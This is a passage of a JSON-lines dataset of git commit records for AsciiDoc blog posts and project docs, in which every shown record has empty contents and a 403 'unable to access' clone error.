rncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b7fcd1776ac82eb9ee13be7e9a7bada2d8d130f0","subject":"Added link for S3 GSOD data set.","message":"Added link for S3 GSOD data set.\n","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/data_sets.adoc","new_file":"docs\/data_sets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc320ca7a9354bdbb04dd02a4562f3b1e3d55f7b","subject":"Update 2015-09-03-ProgramandolaWeb-Blog.adoc","message":"Update 2015-09-03-ProgramandolaWeb-Blog.adoc","repos":"SysAdmin-Blog\/SysAdmin-Blog.github.io,SysAdmin-Blog\/SysAdmin-Blog.github.io,SysAdmin-Blog\/SysAdmin-Blog.github.io","old_file":"_posts\/2015-09-03-ProgramandolaWeb-Blog.adoc","new_file":"_posts\/2015-09-03-ProgramandolaWeb-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SysAdmin-Blog\/SysAdmin-Blog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96ef3c3d04583a1e70f2fc2bbb061729051cb9ab","subject":"Update 2017-08-23-Your-Blog-title.adoc","message":"Update 2017-08-23-Your-Blog-title.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2017-08-23-Your-Blog-title.adoc","new_file":"_posts\/2017-08-23-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f1b6dd72672be7de6706ec3319dd90e375b43b4","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 2019-01-31-Your-Blog-title.adoc","repos":"iwakuralai-n\/badgame-site,iwakuralai-n\/badgame-site,iwakuralai-n\/badgame-site,iwakuralai-n\/badgame-site","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iwakuralai-n\/badgame-site.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63f5ab91b19460d9ede1642248790d113b13e110","subject":"Update 2015-09-30-How-Judas-Iscariot-died.adoc","message":"Update 2015-09-30-How-Judas-Iscariot-died.adoc","repos":"sillyleo\/bible.notes,sillyleo\/bible.notes,sillyleo\/bible.notes","old_file":"_posts\/2015-09-30-How-Judas-Iscariot-died.adoc","new_file":"_posts\/2015-09-30-How-Judas-Iscariot-died.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sillyleo\/bible.notes.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"475375827289e109566086ed729a3bec2a5a95b7","subject":"y2b create post The $100 Pocket Cinema","message":"y2b create post The $100 Pocket Cinema","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-28-The-100-Pocket-Cinema.adoc","new_file":"_posts\/2016-05-28-The-100-Pocket-Cinema.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52a763e70c3b7605dc10d028929a0262d5557625","subject":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","message":"Update 1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_file":"_posts\/1993-8-11-commoncommonfunctionphp-Hubpress-blog-usedcommonphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5014eeff0b4ac8858e376903c58bfb522b85be3c","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73c829c072211b5a68ef971657f153c75e541181","subject":"Update 2015-02-24-Convention-de-nommage-SqlServer.adoc","message":"Update 2015-02-24-Convention-de-nommage-SqlServer.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-02-24-Convention-de-nommage-SqlServer.adoc","new_file":"_posts\/2015-02-24-Convention-de-nommage-SqlServer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d0bdf90289e63fc3a2e5e43c236488fbf8cc475","subject":"Update 2016-08-13-Hubbub.adoc","message":"Update 
2016-08-13-Hubbub.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-08-13-Hubbub.adoc","new_file":"_posts\/2016-08-13-Hubbub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ca5ebdf00f2a61a2be6591fd0a1aed1e3e5f63b","subject":"Update 2017-05-28-Diplom.adoc","message":"Update 2017-05-28-Diplom.adoc","repos":"dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru,dsp25no\/blog.dsp25no.ru","old_file":"_posts\/2017-05-28-Diplom.adoc","new_file":"_posts\/2017-05-28-Diplom.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dsp25no\/blog.dsp25no.ru.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2ed2399834fc1d2cd298dd7f4c8118f02e64690","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38895a1f1030302de46425287fa4902ffac0d0ad","subject":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","message":"Update 2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_file":"_posts\/2015-10-11-Configure-Hadoop-261-on-Ubuntu-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48e78354d8d81f3abc6fbaf1fa7918cceb3bb407","subject":"Update 2016-05-13-Flume.adoc","message":"Update 2016-05-13-Flume.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-05-13-Flume.adoc","new_file":"_posts\/2016-05-13-Flume.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc7c6c91452e4dbbbab642031a043f24ca42661b","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"e25d7db01a3d45bfa6f1b708f9cde473c0e96187","subject":"Quote version value in Docker Compose file","message":"Quote version value in Docker Compose file\n\nThe example Docker Compose file does not quote the version value however\nthe Docker Compose documentation specifies this value should be quoted\nto distinguish it from being treated as a number.\n\nRelate elastic\/elasticsearch#27745\n\nOriginal commit: elastic\/x-pack-elasticsearch@42ad68c3ac6ddbdd0d94603e6487067422b3a86a\n","repos":"robin13\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/en\/setup\/docker.asciidoc","new_file":"docs\/en\/setup\/docker.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ddfab16ce6088ec23a065675ddae961e40cd52a2","subject":"Update 2019-01-31-My-Alt-English-Title.adoc","message":"Update 2019-01-31-My-Alt-English-Title.adoc","repos":"ml4den\/hubpress,ml4den\/hubpress,ml4den\/hubpress,ml4den\/hubpress","old_file":"_posts\/2019-01-31-My-Alt-English-Title.adoc","new_file":"_posts\/2019-01-31-My-Alt-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ml4den\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c4f91429344820c748bcd5f25b710b1bdda0242","subject":"Kafka, Schema Registry and Avro guide","message":"Kafka, Schema Registry and Avro guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/kafka-schema-registry-avro.adoc","new_file":"docs\/src\/main\/asciidoc\/kafka-schema-registry-avro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"76eddf54bac234294d44e4bec201eeb8291e5b19","subject":"Rm Checkstyle plugin","message":"Rm Checkstyle plugin\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse 
install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d349190c3ee4c36a7a4ed5ca3bec2221babb3ea","subject":"Update docs","message":"Update docs\n","repos":"takezoe\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb71b9e81388c225a9590e64ea0eafc71036ea81","subject":"Update 2017-09-20-test.adoc","message":"Update 2017-09-20-test.adoc","repos":"rballan\/rballan.github.io,rballan\/rballan.github.io,rballan\/rballan.github.io,rballan\/rballan.github.io","old_file":"_posts\/2017-09-20-test.adoc","new_file":"_posts\/2017-09-20-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rballan\/rballan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18ecd26ea26849cbbf87b7d39bc55ee4eca82d38","subject":"Add revision\/date to reference docs.","message":"Add revision\/date to reference docs.\n","repos":"mp911de\/spring-cloud-vault-config,spencergibb\/spring-cloud-vault-config,mp911de\/spring-cloud-vault-config,spring-cloud-incubator\/spring-cloud-vault-config,spring-cloud-incubator\/spring-cloud-vault-config,spencergibb\/spring-cloud-vault-config","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-vault-config.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-vault-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-incubator\/spring-cloud-vault-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9473376be7bc9c2c63136913c052d57df40939ab","subject":"Add AM v3 changelog","message":"Add AM v3 changelog\n","repos":"gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management,gravitee-io\/graviteeio-access-management","old_file":"CHANGELOG-v3.adoc","new_file":"CHANGELOG-v3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/graviteeio-access-management.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51bf590a0e5f90269829ab9034b5fb9633610f88","subject":"Revised goals.adoc","message":"Revised goals.adoc\n","repos":"sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv","old_file":"docs\/goals.adoc","new_file":"docs\/goals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc00d8d23253a35e4c75ed9de6fbb9f16ce24a8d","subject":"Updated goals","message":"Updated 
goals","repos":"sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv","old_file":"docs\/goals.adoc","new_file":"docs\/goals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9f5c237188107d8d6599aa6f47cbce91eaa196d9","subject":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","message":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f9cbe76102ac56c928bb334c6569c4b0993347d","subject":"DELTASPIKE-813 Core docs: added DependentProvider, AnnotationInstanceProvider, AnnotationUtils","message":"DELTASPIKE-813 Core docs: added DependentProvider, AnnotationInstanceProvider, AnnotationUtils\n","repos":"struberg\/deltaspike,rdicroce\/deltaspike,os890\/deltaspike-vote,danielsoro\/deltaspike,subaochen\/deltaspike,mlachat\/deltaspike,subaochen\/deltaspike,subaochen\/deltaspike,mlachat\/deltaspike,os890\/DS_Discuss,Danny02\/deltaspike,struberg\/deltaspike,os890\/deltaspike-vote,struberg\/deltaspike,chkal\/deltaspike,os890\/deltaspike-vote,chkal\/deltaspike,os890\/DS_Discuss,idontgotit\/deltaspike,danielsoro\/deltaspike,apache\/deltaspike,apache\/deltaspike,chkal\/deltaspike,os890\/DS_Discuss,rdicroce\/deltaspike,os890\/DS_Discuss,apache\/deltaspike,Danny02\/deltaspike,idontgotit\/deltaspike,subaochen\/deltaspike,rdicroce\/deltaspike,mlachat\/deltaspike,rdicroce\/deltaspike,chkal\/deltaspike,Danny02\/deltaspike,mlachat\/deltaspike,idontgotit\/deltaspike,apache\/deltaspike,danielsoro\/deltaspike,Danny02\/deltaspike,danielsoro\/deltaspike,struberg\/deltaspike,idontgotit\/deltaspike,os890\/deltaspike-vote","old_file":"documentation\/src\/main\/asciidoc\/core.adoc","new_file":"documentation\/src\/main\/asciidoc\/core.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d4767cc440733ae38615cf0c51b37ef52df5dd9","subject":"Update 2015-03-09-Mud-Masters-Haarlemmermeer-2015.adoc","message":"Update 2015-03-09-Mud-Masters-Haarlemmermeer-2015.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-09-Mud-Masters-Haarlemmermeer-2015.adoc","new_file":"_posts\/2015-03-09-Mud-Masters-Haarlemmermeer-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b314fe1ded39288b21d45ffd6a7505a4301279fb","subject":"y2b create post Unboxing An Electric 
Toothbrush","message":"y2b create post Unboxing An Electric Toothbrush","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-24-Unboxing-An-Electric-Toothbrush.adoc","new_file":"_posts\/2015-11-24-Unboxing-An-Electric-Toothbrush.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4001ad00f06c3c172293c8701187bbe0273f7450","subject":"Update 2015-09-14-Your-title.adoc","message":"Update 2015-09-14-Your-title.adoc","repos":"whelamc\/life,whelamc\/life,whelamc\/life","old_file":"_posts\/2015-09-14-Your-title.adoc","new_file":"_posts\/2015-09-14-Your-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/whelamc\/life.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5ab02a278c4b4f4d1687ac0c036fae0d7c460bd","subject":"Update 2016-04-08-First-Post.adoc","message":"Update 2016-04-08-First-Post.adoc","repos":"reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io,reggert\/reggert.github.io","old_file":"_posts\/2016-04-08-First-Post.adoc","new_file":"_posts\/2016-04-08-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reggert\/reggert.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4e300793f8890aeac7abc282a9d6eb72594d34d","subject":"import BitScheme.adoc","message":"import BitScheme.adoc\n","repos":"TheSwanFactory\/hclang,TheSwanFactory\/maml,TheSwanFactory\/maml,TheSwanFactory\/hclang","old_file":"doc\/BitScheme.adoc","new_file":"doc\/BitScheme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheSwanFactory\/maml.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07c16bc6b2ce87072f608185fd4ae4a0edb44767","subject":"basic docs","message":"basic docs\n","repos":"sarmbruster\/thinkpad_x1_yoga_rotation","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sarmbruster\/thinkpad_x1_yoga_rotation.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b6016eefc0ff55633874a5a0a2ec336151f2c770","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08770746d80dcb9f8fdcc975c08b33f79ade14d9","subject":"y2b create post O'Neill The Stretch Headphones Unboxing \\u0026 Overview","message":"y2b create post O'Neill The Stretch Headphones Unboxing \\u0026 
Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-27-ONeill-The-Stretch-Headphones-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-27-ONeill-The-Stretch-Headphones-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1b9f9376f8201f9f9e1e752cc6ed8480043eef1","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"908f09441576eb9eef7ad70abd9e3b91652c15ab","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"691380d37f0b7fe01b100e7239c782859f1651fd","subject":"Update 2017-01-27-Programing-Architecture-And-Math.adoc","message":"Update 2017-01-27-Programing-Architecture-And-Math.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Programing-Architecture-And-Math.adoc","new_file":"_posts\/2017-01-27-Programing-Architecture-And-Math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e52d76b653368be42bed7da4ce8b6ef069352aa","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d32aedc5cd2c678eb96ed39f4c7ed49fc678f53","subject":"Update 2016-12-16-Hello-World.adoc","message":"Update 
2016-12-16-Hello-World.adoc","repos":"TelfordLab\/telfordlab.github.io,TelfordLab\/telfordlab.github.io,TelfordLab\/telfordlab.github.io,TelfordLab\/telfordlab.github.io","old_file":"_posts\/2016-12-16-Hello-World.adoc","new_file":"_posts\/2016-12-16-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TelfordLab\/telfordlab.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb2468e58470a866a611d561ed1a08cbd0e8a88f","subject":"Renamed '_posts\/2017-08-25-Thrasos-Secret-Code.adoc' to '_posts\/2017-08-25-Hello-W0r15.adoc'","message":"Renamed '_posts\/2017-08-25-Thrasos-Secret-Code.adoc' to '_posts\/2017-08-25-Hello-W0r15.adoc'","repos":"thrasos\/thrasos.github.io,thrasos\/thrasos.github.io,thrasos\/thrasos.github.io,thrasos\/thrasos.github.io","old_file":"_posts\/2017-08-25-Hello-W0r15.adoc","new_file":"_posts\/2017-08-25-Hello-W0r15.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thrasos\/thrasos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84084b83d7748be4912af999e1a4184301ff1088","subject":"Update 2018-01-30-understanding-empathy.adoc","message":"Update 2018-01-30-understanding-empathy.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2018-01-30-understanding-empathy.adoc","new_file":"_posts\/2018-01-30-understanding-empathy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31059fbbf45155ed8a33b8b65490c4de680943ff","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 